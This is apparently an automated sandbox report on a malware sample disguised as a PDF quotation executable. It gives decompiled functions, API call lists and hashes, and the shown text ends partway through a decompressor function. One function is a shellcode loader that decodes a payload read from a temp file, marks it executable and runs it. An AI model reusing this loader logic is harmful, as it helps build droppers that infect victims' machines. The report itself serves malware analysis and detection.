                control_flow_graph 480 4015b3-4015c6 call 4029e8 call 40560c 485 4015c8-4015e3 call 4055a3 CreateDirectoryA 480->485 486 40160a-40160d 480->486 495 401600-401608 485->495 496 4015e5-4015f0 GetLastError 485->496 487 40162d-40215b call 401423 486->487 488 40160f-401628 call 401423 call 405a85 SetCurrentDirectoryA 486->488 502 40287d-40288c 487->502 488->502 495->485 495->486 499 4015f2-4015fb GetFileAttributesA 496->499 500 4015fd 496->500 499->495 499->500 500->495
                C-Code - Quality: 85%
                			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E004029E8(0xfffffff0);
				_t10 = E0040560C(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E004055A3(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405A85("C:\\Users\\hardz\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                0x004015b3
                0x004015ba
                0x004015bd
                0x004015c2
                0x004015c6
                0x004015c8
                0x004015d0
                0x004015d6
                0x004015d8
                0x004015db
                0x004015e3
                0x004015f0
                0x004015fd
                0x004015fd
                0x004015f2
                0x004015f3
                0x004015fb
                0x00000000
                0x00000000
                0x004015fb
                0x004015f0
                0x00401600
                0x00401603
                0x00401605
                0x00401606
                0x004015c8
                0x0040160d
                0x0040162d
                0x00402156
                0x0040160f
                0x00401611
                0x0040161c
                0x00401622
                0x00401622
                0x00402880
                0x0040288c

                APIs
                  • Part of subcall function 0040560C: CharNextA.USER32(004053BE,?,004218A0,00000000,00405670,004218A0,004218A0,?,?,74E5F560,004053BE,?,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,74E5F560), ref: 0040561A
                  • Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040561F
                  • Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040562E
                • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                Strings
                • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                • String ID: C:\Users\user\AppData\Local\Temp
                • API String ID: 3751793516-501415292
                • Opcode ID: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
                • Instruction ID: 11ba4fe5436512bc7837d50811c3794abd92905400bb47a2e3f09ad75438aea6
                • Opcode Fuzzy Hash: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
                • Instruction Fuzzy Hash: B3010431908150AFDB116FB51D44D7F67B0AA56365768073BF491B22E2C63C4942D62E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040578B, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 505 40578b-405795 506 405796-4057c0 GetTickCount GetTempFileNameA 505->506 507 4057c2-4057c4 506->507 508 4057cf-4057d1 506->508 507->506 509 4057c6 507->509 510 4057c9-4057cc 508->510 509->510
                C-Code - Quality: 100%
                			E0040578B(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                0x0040578f
                0x00405795
                0x00405796
                0x00405796
                0x00405797
                0x0040579e
                0x004057a8
                0x004057b5
                0x004057b8
                0x004057c0
                0x00000000
                0x00000000
                0x004057c4
                0x00000000
                0x00000000
                0x004057c6
                0x00000000
                0x004057c6
                0x00000000

                APIs
                • GetTickCount.KERNEL32 ref: 0040579E
                • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004057B8
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: CountFileNameTempTick
                • String ID: "C:\Users\user\Desktop\QUOTAZIONEpdf.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                • API String ID: 1716503409-1349037682
                • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                • Instruction ID: 4fcdc00fff711095840056c8ed2a58f2bfde19b521d5dac465ae6a1bf3f6778c
                • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                • Instruction Fuzzy Hash: F9F0A736348304B6D7104E55DC04B9B7F69DF91750F14C02BFA449B1C0D6B0995497A5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 72FB10A0, Relevance: 6.1, APIs: 4, Instructions: 89filememoryCOMMON
                Download Yara Rule

                Control-flow Graph

                C-Code - Quality: 76%
                			E72FB10A0(void* __ecx, void* __eflags) {
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				short _v24;
				short _v26;
				char _v28;
				void* _v32;
				long _v36;
				long _v40;
				short _v1080;
				void _v6216;
				void* _t38;
				intOrPtr _t41;
				struct _OVERLAPPED* _t65;
				void* _t74;

				E72FB1000(0x1844, __ecx);
				_v28 = 0x70;
				_v26 = 0x64;
				_v24 = 0x71;
				_v22 = 0x6c;
				_v20 = 0x72;
				_v18 = 0x75;
				_v16 = 0x6e;
				_v14 = 0x72;
				_v12 = 0x63;
				_v10 = 0x6d;
				_v8 = 0;
				GetTempPathW(0x103,  &_v1080);
				E72FB1030( &_v1080,  &_v28);
				VirtualProtect( &_v6216, 0x1410, 0x40,  &_v36); // executed
				_t38 = CreateFileW( &_v1080, 0x80000000, 7, 0, 3, 0x80, 0); // executed
				_v32 = _t38;
				ReadFile(_v32,  &_v6216, 0x1410,  &_v40, 0); // executed
				_t65 = 0;
				while(1) {
					_t41 =  *((intOrPtr*)(_t74 + _t65 - 0x1844));
					if(_t65 == 0x1410) {
						break;
					}
					 *((char*)(_t74 + _t65 - 0x1844)) = ((_t41 + 2 ^ 0x00000005) - 0xffffffffffffff18 + 0x9c - 0xffffffffffffffb1 + 0x000000a0 ^ 0x00000018) + 0x26;
					_t65 =  &(_t65->Internal);
				}
				_v6216();
				return 0;
			}























                0x72fb10a8
                0x72fb10b2
                0x72fb10bb
                0x72fb10c4
                0x72fb10cd
                0x72fb10d6
                0x72fb10df
                0x72fb10e8
                0x72fb10f1
                0x72fb10fa
                0x72fb1103
                0x72fb1109
                0x72fb1119
                0x72fb112a
                0x72fb1144
                0x72fb1163
                0x72fb1169
                0x72fb1182
                0x72fb1188
                0x72fb118d
                0x72fb118d
                0x72fb119a
                0x00000000
                0x00000000
                0x72fb11b4
                0x72fb11bb
                0x72fb11bb
                0x72fb11cd
                0x72fb11d4

                APIs
                • GetTempPathW.KERNEL32(00000103,?), ref: 72FB1119
                • VirtualProtect.KERNELBASE(?,00001410,00000040,?), ref: 72FB1144
                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 72FB1163
                • ReadFile.KERNELBASE(?,?,00001410,?,00000000), ref: 72FB1182
                Memory Dump Source
                • Source File: 00000001.00000002.301006655.0000000072FB1000.00000020.00020000.sdmp, Offset: 72FB0000, based on PE: true
                • Associated: 00000001.00000002.300992068.0000000072FB0000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.301011867.0000000072FB2000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_72fb0000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: File$CreatePathProtectReadTempVirtual
                • String ID:
                • API String ID: 205760209-0
                • Opcode ID: 1f529c657086bcbf0f0fd90e84cc92244e1a9edd744c606686b3d3ad68f0f74d
                • Instruction ID: de0bd2a9576c58f6b1c284d570405a9ef26125e1e8079dd39ffbdcd19e2f4782
                • Opcode Fuzzy Hash: 1f529c657086bcbf0f0fd90e84cc92244e1a9edd744c606686b3d3ad68f0f74d
                • Instruction Fuzzy Hash: 27310871E10209ABEB10CBB0CC51BEE7339EF54740F00946CE209EB2D0EA796B01C765
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004031F1, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                Download Yara Rule

                Control-flow Graph

                C-Code - Quality: 84%
                			E004031F1(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
				E00405CE3(_t6);
				_t2 = E004055E5(_t6);
				if(_t2 != 0) {
					E00405578(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E0040578B("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}






                0x004031f2
                0x004031f8
                0x004031fe
                0x00403205
                0x0040320a
                0x00403212
                0x0040321e
                0x00403224
                0x00403208
                0x00403208
                0x00403208

                APIs
                  • Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                  • Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                  • Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                  • Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00403212
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: Char$Next$CreateDirectoryPrev
                • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                • API String ID: 4115351271-1075807775
                • Opcode ID: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
                • Instruction ID: 52f5018bb87fe832e559484150a565c10a299960058697363e648776ae6da385
                • Opcode Fuzzy Hash: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
                • Instruction Fuzzy Hash: 68D0C92164AD3036D551372A3D0AFDF090D9F4272EF21417BF804B50CA5B6C6A8319EF
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00406481, Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 618 406481-406487 619 406489-40648b 618->619 620 40648c-4064aa 618->620 619->620 621 4066b8-4066cd 620->621 622 40677d-40678a 620->622 624 4066e7-4066fd 621->624 625 4066cf-4066e5 621->625 623 4067b4-4067b8 622->623 627 406818-40682b 623->627 628 4067ba-4067db 623->628 626 406700-406707 624->626 625->626 629 406709-40670d 626->629 630 40672e 626->630 631 406734-40673a 627->631 632 4067f4-406807 628->632 633 4067dd-4067f2 628->633 634 406713-40672b 629->634 635 4068bc-4068c6 629->635 630->631 641 4068e7 631->641 642 405edf 631->642 637 40680a-406811 632->637 633->637 634->630 640 4068d2-4068e5 635->640 638 4067b1 637->638 639 406813 637->639 638->623 653 406796-4067ae 639->653 654 4068c8 639->654 644 4068ea-4068ee 640->644 641->644 645 405ee6-405eea 642->645 646 406026-406047 642->646 647 405f8b-405f8f 642->647 648 405ffb-405fff 642->648 645->640 655 405ef0-405efd 645->655 646->621 651 405f95-405fae 647->651 652 40683b-406845 647->652 649 406005-406019 648->649 650 40684a-406854 648->650 657 40601c-406024 649->657 650->640 658 405fb1-405fb5 651->658 652->640 653->638 654->640 655->641 656 405f03-405f49 655->656 659 405f71-405f73 656->659 660 405f4b-405f4f 656->660 657->646 657->648 658->647 661 405fb7-405fbd 658->661 664 405f81-405f89 659->664 665 405f75-405f7f 659->665 662 405f51-405f54 GlobalFree 660->662 663 405f5a-405f68 GlobalAlloc 660->663 666 405fe7-405ff9 661->666 667 405fbf-405fc6 661->667 662->663 663->641 668 405f6e 663->668 664->658 665->664 665->665 666->657 669 405fd1-405fe1 GlobalAlloc 667->669 670 405fc8-405fcb GlobalFree 667->670 668->659 669->641 669->666 670->669
                C-Code - Quality: 99%
                			E00406481() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004068EF))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
